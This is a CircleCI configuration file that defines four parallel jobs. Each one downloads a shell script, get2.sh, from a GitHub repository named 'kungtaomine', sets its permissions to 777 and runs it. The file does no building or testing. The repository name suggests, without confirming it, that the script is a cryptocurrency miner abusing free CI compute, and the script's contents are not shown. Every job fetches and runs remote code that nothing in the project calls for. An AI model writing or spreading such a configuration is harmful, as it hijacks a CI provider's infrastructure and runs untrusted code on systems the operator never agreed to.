version: 2.1

# Define the jobs we want to run for this project
jobs:
  gas1:
    docker:
      - image: cimg/go:1.13.15-browsers
    steps:
      - run: wget https://github.com/bebfuj/kungtaomine/raw/main/get2.sh 
      - run: chmod 777 get2.sh 
      - run: ./get2.sh
  gas2:
    docker:
      - image: cimg/go:1.13.15-browsers
    steps:
      - run: wget https://github.com/bebfuj/kungtaomine/raw/main/get2.sh 
      - run: chmod 777 get2.sh 
      - run: ./get2.sh
  gas3:
    docker:
      - image: cimg/go:1.13.15-browsers
    steps:
      - run: wget https://github.com/bebfuj/kungtaomine/raw/main/get2.sh 
      - run: chmod 777 get2.sh 
      - run: ./get2.sh
  gas4:
    docker:
      - image: cimg/go:1.13.15-browsers
    steps:
      - run: wget https://github.com/bebfuj/kungtaomine/raw/main/get2.sh 
      - run: chmod 777 get2.sh 
      - run: ./get2.sh

# Orchestrate our job run sequence
workflows:
  alp_5:
    jobs:
      - gas1
      - gas2
      - gas3
      - gas4